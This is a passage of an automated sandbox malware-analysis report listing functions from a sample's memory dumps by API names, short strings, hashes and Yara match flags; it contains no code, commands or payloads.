                          • Instruction Fuzzy Hash: F3519C30558A844EF750AB68D481BEA77EAEF88304F3C417DD85AC3292DB25DE438782
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$malloc$_callnewhfree
                          • String ID: d$d$d
                          • API String ID: 1789327305-1898527202
                          • Opcode ID: bec0fa3781f216dc962bf1dcecdcf35b177b188f5bd9887f529aa035ee97c4f6
                          • Instruction ID: 3201436e05ed4be90ea798d2cfc108c9c922ce32632fc3fbc481cde7b3d8ce2a
                          • Opcode Fuzzy Hash: bec0fa3781f216dc962bf1dcecdcf35b177b188f5bd9887f529aa035ee97c4f6
                          • Instruction Fuzzy Hash: C251F5B0458A598FEBD1DF18D088B957BF5FB18700F5581BAD80CCB26AEB70C9848F90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$malloc$AllocateHeap_callnewhfree
                          • String ID: d$d$d
                          • API String ID: 133375854-1898527202
                          • Opcode ID: 1f798697604a03fc75b9b18e084cac3ea39fc0a6f99398ec1fcba1ef6a5bdc0e
                          • Instruction ID: 90003b40735148ad321cbacb5f1303dfcdbff6045103a234a32647c96e0105a9
                          • Opcode Fuzzy Hash: 1f798697604a03fc75b9b18e084cac3ea39fc0a6f99398ec1fcba1ef6a5bdc0e
                          • Instruction Fuzzy Hash: 6A51D7B0414A598FEB90DF58C088B957BF5FB58700F6981BA981DDB26ADB70C944CFA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                          • String ID:
                          • API String ID: 3894533514-0
                          • Opcode ID: c68300e9c4ed9cf773f416173acfa5436c5f899a8b3552d1810b3d70258f5184
                          • Instruction ID: c25528b4abcfa1a8d68f00031c5bfaacfd85eb72e3a441ac368d77571a1d041e
                          • Opcode Fuzzy Hash: c68300e9c4ed9cf773f416173acfa5436c5f899a8b3552d1810b3d70258f5184
                          • Instruction Fuzzy Hash: 6E51CF326846D286F7989B25D440BE977B3F780B94F54613EDA9A473A6CB38CE07C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$Heapmalloc$AllocErrorFreeLast_callnewhfree
                          • String ID: d$d$d
                          • API String ID: 161857241-1898527202
                          • Opcode ID: 67646a7dd6c968ecf2f44fcd8d8c0670da6240c8fc3f999a67afc5524764c4a7
                          • Instruction ID: 281513a03e77f43f2d995ac76127665303ca9369a61bbd3c8527db88bb06a28b
                          • Opcode Fuzzy Hash: 67646a7dd6c968ecf2f44fcd8d8c0670da6240c8fc3f999a67afc5524764c4a7
                          • Instruction Fuzzy Hash: 3541F472112B91C5E7808F25E58038D3ABAF748F88F5A813ADB8847798EF74C955CB60
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$_errno$_lockfreemalloc
                          • String ID:
                          • API String ID: 360200360-0
                          • Opcode ID: b51325237b74aa9e7445f28ecc4ae510949fb52723a3c6bcf1fe359266725097
                          • Instruction ID: 9ddd9ad6b715aa74a9274bef6f0048fc43f523430a5d6291fa1fe28700e3bf72
                          • Opcode Fuzzy Hash: b51325237b74aa9e7445f28ecc4ae510949fb52723a3c6bcf1fe359266725097
                          • Instruction Fuzzy Hash: 092192321C8A898FF764AFA4D545BE976F3EB94304F11443DA00AC35D2DB78DE428741
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _set_error_mode$_errno$_lockfreemalloc
                          • String ID:
                          • API String ID: 360200360-0
                          • Opcode ID: 99c55fd89446ed5a655e27bc626f276377e361e5d9c589b6ca3f3bf4f2833f14
                          • Instruction ID: dd3ac4d33f015051b002a9ae930f15b0c08260a9d9864ab2da3500286079d328
                          • Opcode Fuzzy Hash: 99c55fd89446ed5a655e27bc626f276377e361e5d9c589b6ca3f3bf4f2833f14
                          • Instruction Fuzzy Hash: B3215E302946998BF764BB68D456BA973BAEF89300F6C443DA05BC31D2DB64CE428751
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                          • String ID:
                          • API String ID: 517548149-0
                          • Opcode ID: b836d934eec16e7e78ac168315cfa26f01e2ad9148ac4e656bdc2540d0e8e9dd
                          • Instruction ID: 83529df84a4cc0bb8ec316fb3f97d34151b74a6657839e61873528fe1ffd9679
                          • Opcode Fuzzy Hash: b836d934eec16e7e78ac168315cfa26f01e2ad9148ac4e656bdc2540d0e8e9dd
                          • Instruction Fuzzy Hash: ED216D32A44BD586FB209F22E450B9977B7FB88BC1F495029DA8A47B54DF38CA52C704
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventReset$CurrentObjectSingleThreadTimeWait_errno_invalid_parameter_noinfotime
                          • String ID:
                          • API String ID: 2543248268-0
                          • Opcode ID: 78e537520ed695ee5ae1225d7567b1703dce6c02efaa216bba7f739a809b494c
                          • Instruction ID: bc06a053c50b6aaf45489feef3bca37e10ffece0adc82afa1dccc16a655e2656
                          • Opcode Fuzzy Hash: 78e537520ed695ee5ae1225d7567b1703dce6c02efaa216bba7f739a809b494c
                          • Instruction Fuzzy Hash: 6E215E36244BD186E740DF21E8807997372F784F94F18513ADE4987768DF78CA42C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EventThread$CloseCurrentErrorLastSwitchclosesocketsendshutdown
                          • String ID:
                          • API String ID: 779811758-0
                          • Opcode ID: 00e3de7fc8725f4b2d8cdc05c81e10fbf63856aeac18edff56d4f986a8fa95c7
                          • Instruction ID: 9f41e05a1065f9e26491d2c3674555a48fd11a2a0e933ff84795919d568a9538
                          • Opcode Fuzzy Hash: 00e3de7fc8725f4b2d8cdc05c81e10fbf63856aeac18edff56d4f986a8fa95c7
                          • Instruction Fuzzy Hash: 3A21533124068286FB20AF25E4D0B983373FB88FA8F5442399A29476D9EF34CD86C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                          • String ID:
                          • API String ID: 3106088686-0
                          • Opcode ID: 465c1297e5f936002f31835874a9c435263bc14cb6033124fff1d9044e32e118
                          • Instruction ID: cda21cb18543c39129c8dadc360c1e521fba290ab0d70d819301da1ca7c43737
                          • Opcode Fuzzy Hash: 465c1297e5f936002f31835874a9c435263bc14cb6033124fff1d9044e32e118
                          • Instruction Fuzzy Hash: 8D0184346417E782FB44AB65D454B9832B3BB68B64F18923DD926023C5EF3CCE478320
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_getptd_invalid_parameter_noinfo
                          • String ID: $$$
                          • API String ID: 2372577547-233714265
                          • Opcode ID: 6b5051b5bc1d557b7424b4656fcd09d6d4fddccb4a49d3db86b5a37965dede4a
                          • Instruction ID: 5455111757687c610ff26506e72ba3cae4074c38b9ac6910bc21d5e1543eff22
                          • Opcode Fuzzy Hash: 6b5051b5bc1d557b7424b4656fcd09d6d4fddccb4a49d3db86b5a37965dede4a
                          • Instruction Fuzzy Hash: 0B8133338D8AD84AF77D5A19C985BF936F2E746710F24067DD8D3969C2DB24CE438241
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: 2dee8eee062c467992d154c250ee21dc4d631f61e710adb1d4d32dddbb98b58a
                          • Instruction ID: 77ec2b2872209d6b5aea5c3006318ef1a2ae3bd0db96b19b050d1da556857f8a
                          • Opcode Fuzzy Hash: 2dee8eee062c467992d154c250ee21dc4d631f61e710adb1d4d32dddbb98b58a
                          • Instruction Fuzzy Hash: 7D917871189A898FE795EF68C184BA9B7F1FF19304F1484ADD04EDB162CB31E982CB51
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: free$_errno
                          • String ID:
                          • API String ID: 2288870239-0
                          • Opcode ID: 19403980c4b82a5381c6d13ab520cf831e32148cf56f6c96db5af4a91658fc77
                          • Instruction ID: 78be59cc4f1fc67115980f0a2640e5d95f3b1ab34242f539f5bff36ec4ca7b84
                          • Opcode Fuzzy Hash: 19403980c4b82a5381c6d13ab520cf831e32148cf56f6c96db5af4a91658fc77
                          • Instruction Fuzzy Hash: 6E913B70105A898FE795EFA8C095BA9B7F6FF19304F2844ADD04ADB152C771ED42CB41
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3569367362-2084237596
                          • Opcode ID: 71d4d7f3723b5425788edb4ff7159e0c2d35ca9445fe2397f069a4d9efb0fa2f
                          • Instruction ID: 463925bc9867eb98e80f9a31a9887a460371d191e0acd4e4c41ce2ac0414e4b0
                          • Opcode Fuzzy Hash: 71d4d7f3723b5425788edb4ff7159e0c2d35ca9445fe2397f069a4d9efb0fa2f
                          • Instruction Fuzzy Hash: E071AF30158B898BF760EB58C405BE9B3E6FF81304F6C466ED445C3556DBB8EA52C782
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 36009230a0f1777ccfbb89fc56372207fae1e11fc8fa657492cdc956de2ed38c
                          • Instruction ID: 802b6f97ed6a07c75d5c518f53d1258ae1d2cd26759f514887e9432a1eb7eec6
                          • Opcode Fuzzy Hash: 36009230a0f1777ccfbb89fc56372207fae1e11fc8fa657492cdc956de2ed38c
                          • Instruction Fuzzy Hash: 31711176246AC186EB119F69E5C0BDD77B2F758B80F59902ADB8A07311CF38D9A2C310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 3655708593-3916222277
                          • Opcode ID: 678a5d9060657e1d823d637cf28b2f0c58d29ed2dcd500e0a7d9d9ccc373c5e5
                          • Instruction ID: 62ea53aeecd75fe2245c12391e4708ca6f5bc6f04892cb241a41cd216b198e61
                          • Opcode Fuzzy Hash: 678a5d9060657e1d823d637cf28b2f0c58d29ed2dcd500e0a7d9d9ccc373c5e5
                          • Instruction Fuzzy Hash: 3351FFB2180A484BF768AF28C6C2BE936F2EB45310F14026DD856CB6D6D774CE838691
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$CallTranslator_amsg_exit
                          • String ID: MOC$RCC
                          • API String ID: 1374396951-2084237596
                          • Opcode ID: 1d462c2f10ce24a519212633c1e6cfe29c97502a7330fb4d454685fe849e362c
                          • Instruction ID: 44021ff09ac15f94dada44ab5e3c557fba632f86f0a61bbe44b71818f642042c
                          • Opcode Fuzzy Hash: 1d462c2f10ce24a519212633c1e6cfe29c97502a7330fb4d454685fe849e362c
                          • Instruction Fuzzy Hash: E361B272644AC286EB24EF15E480FEDB373F780B89F44452ADB8E47695DB78CA56C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$ExceptionRaise_amsg_exit
                          • String ID: csm
                          • API String ID: 4155239085-1018135373
                          • Opcode ID: d886a1c3553cd68f9cf7a97644700504b665781d40d3803e2721c710f225a129
                          • Instruction ID: 03bc1f0b1e96633e93a51f4f170caae3c0a2b3b2fce385e270f3a765d10db198
                          • Opcode Fuzzy Hash: d886a1c3553cd68f9cf7a97644700504b665781d40d3803e2721c710f225a129
                          • Instruction Fuzzy Hash: EA31303654468187F670AF12E040B9DB3B2F795B65F00423ADE9A07B95DB3ADE46CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteOpenValue
                          • String ID: Console$IpDatespecial
                          • API String ID: 849931509-1840232981
                          • Opcode ID: e6bf59a39c93ccd8a2fce3cb6291b36bd99a0536316f225a4c4a7a176ea83b98
                          • Instruction ID: 28bd21512056e2f2ef440519b2ea24a495d562a7020ce8edf4963c9739078b47
                          • Opcode Fuzzy Hash: e6bf59a39c93ccd8a2fce3cb6291b36bd99a0536316f225a4c4a7a176ea83b98
                          • Instruction Fuzzy Hash: 79F01D3274098286FB20AB55F940BC97332F3407A9F000226CD5D43698DF78CA8AC704
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-0
                          • Opcode ID: dea3ac2ba7795ca4fc04a54829bc07f5f28fc5d4702961cbb12294847e09e509
                          • Instruction ID: 63e55f65673a87b9bedb62687523c3130a6e12c8341052ab7d26c550b3ce2c39
                          • Opcode Fuzzy Hash: dea3ac2ba7795ca4fc04a54829bc07f5f28fc5d4702961cbb12294847e09e509
                          • Instruction Fuzzy Hash: D041D0726407A28AFB689F39C451BAC36B3E784B94F54223DDA65473D5DB38CE42C780
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast
                          • String ID: Main
                          • API String ID: 1452528299-521822810
                          • Opcode ID: f6bbeae5cd547684b12614fe3c7d5d17ce7c357ab5793ef19da540d674d16875
                          • Instruction ID: 772a691aa495c262bd8a5bdb261a7022c88852dd9e0575bc7370c2dd789d5022
                          • Opcode Fuzzy Hash: f6bbeae5cd547684b12614fe3c7d5d17ce7c357ab5793ef19da540d674d16875
                          • Instruction Fuzzy Hash: 0341AF32B40AA2CAFB54CF11D141BA933B3F758B88F445039DA8947785DB38DE42CB80
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastRead$mallocrealloc
                          • String ID:
                          • API String ID: 3638135368-0
                          • Opcode ID: 57d93e2d794d31c73ddf79fd2eef244c1df7bfe1804209be54d35a557055a819
                          • Instruction ID: 916cd8ed5a6302837fcbd69b9ad3677ff8abe9fb052424e1ce1e4bd7246b8f05
                          • Opcode Fuzzy Hash: 57d93e2d794d31c73ddf79fd2eef244c1df7bfe1804209be54d35a557055a819
                          • Instruction Fuzzy Hash: 30418032240BC587FB208F16E450BAAB7B2FB49B95F184029DF4A07764DF38D946C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$StringTypefreemalloc
                          • String ID:
                          • API String ID: 307345228-0
                          • Opcode ID: 897931331240f9ce2a7c565d2b2c43d51d0b86d34883ef3d5b0f097aaad4e249
                          • Instruction ID: 12a612b6b7ef1c980cbc7313581f4b5ce8eccf866939bc5fa1e7655bc8496adb
                          • Opcode Fuzzy Hash: 897931331240f9ce2a7c565d2b2c43d51d0b86d34883ef3d5b0f097aaad4e249
                          • Instruction Fuzzy Hash: 51419F3264069186FB149F25D811BD963B7FB44BE8F58523AEE2D477D5DB38CE028310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$_errno$AllocCreateHeapObjectSection_callnewhmalloc
                          • String ID:
                          • API String ID: 2034203143-0
                          • Opcode ID: b5ee60dcc23de6932e17d70413b68075728645683aec6840a5fc2d6d18115cc8
                          • Instruction ID: f0fb6dcb46dfb04c6d1bb2c6dcdce410c1068fa4da8fc0974a113596734517c8
                          • Opcode Fuzzy Hash: b5ee60dcc23de6932e17d70413b68075728645683aec6840a5fc2d6d18115cc8
                          • Instruction Fuzzy Hash: 9C3171322446C182FF659F32D481BEEA6B7FB58B84F488439DF4957765EB78CA028700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$recv
                          • String ID:
                          • API String ID: 316788870-0
                          • Opcode ID: 3da117cddbf6bbce9cbf033f5496cc6c6a7c3f4bfe53dba83cf0896eb070ff71
                          • Instruction ID: f4fe97c87a4135f261d41f4eb4559e458362db085ca6d7cb823877a9ef9b9d50
                          • Opcode Fuzzy Hash: 3da117cddbf6bbce9cbf033f5496cc6c6a7c3f4bfe53dba83cf0896eb070ff71
                          • Instruction Fuzzy Hash: 57418D32244A8285FB609F29E4C4B9D27B3F745B98F54453ADB1983698EB39CE86C701
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _ctrlfp$_set_statfp$_exception_enabled_raise_exc
                          • String ID:
                          • API String ID: 3456427917-0
                          • Opcode ID: 2d7edc7519fb73cf76ba16e443ff7478fbca3bdb4f6fdcc44a9c8c0f234c6810
                          • Instruction ID: 3fbe7ea36de7fb904d596ed16816b22c6ed0ef08d4732856b1ff9fccaa97aa29
                          • Opcode Fuzzy Hash: 2d7edc7519fb73cf76ba16e443ff7478fbca3bdb4f6fdcc44a9c8c0f234c6810
                          • Instruction Fuzzy Hash: 6A318236654BC58AF750DF25E401BEEB772F789798F001229FA491AA58DB38C942CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocGuaranteeInfoProtectQueryStackSystemThread
                          • String ID:
                          • API String ID: 513674450-0
                          • Opcode ID: 92c15f89d57241f6b16f901cecf13a501dead97400cb3aaf053e3c9941c96e37
                          • Instruction ID: 5fe3e8f4869abdfb77fb956ca72aff68badc4ceead4022e2f94926f9ee9f8e66
                          • Opcode Fuzzy Hash: 92c15f89d57241f6b16f901cecf13a501dead97400cb3aaf053e3c9941c96e37
                          • Instruction Fuzzy Hash: F8315232350AD28AEB14DF31E844BDD33F6F748788F48502A9A0A47758DF38DA46C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$__doserrno
                          • String ID:
                          • API String ID: 2614100947-0
                          • Opcode ID: f6747c994bee0120bca5ea429985f7c2a1c01f1207c446315ef510763f0ad3e3
                          • Instruction ID: bacca1a9d00ad28fea435d1d7c81886f43e0ee8e6161dc507f0bb5f70257c03a
                          • Opcode Fuzzy Hash: f6747c994bee0120bca5ea429985f7c2a1c01f1207c446315ef510763f0ad3e3
                          • Instruction Fuzzy Hash: 0121F8326C86908EF2146BA8D6D1BED3AF2EB45310F04053DF416875D3D764CE968256
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$__doserrno
                          • String ID:
                          • API String ID: 2614100947-0
                          • Opcode ID: b78143fa32f064d218713fe95a5adf2227d442b671ea0c90b86e696d9d98e483
                          • Instruction ID: 1e22a32c3298f4ae2743c32f05003a95cf49ca885738398b90b59e2cb5f517af
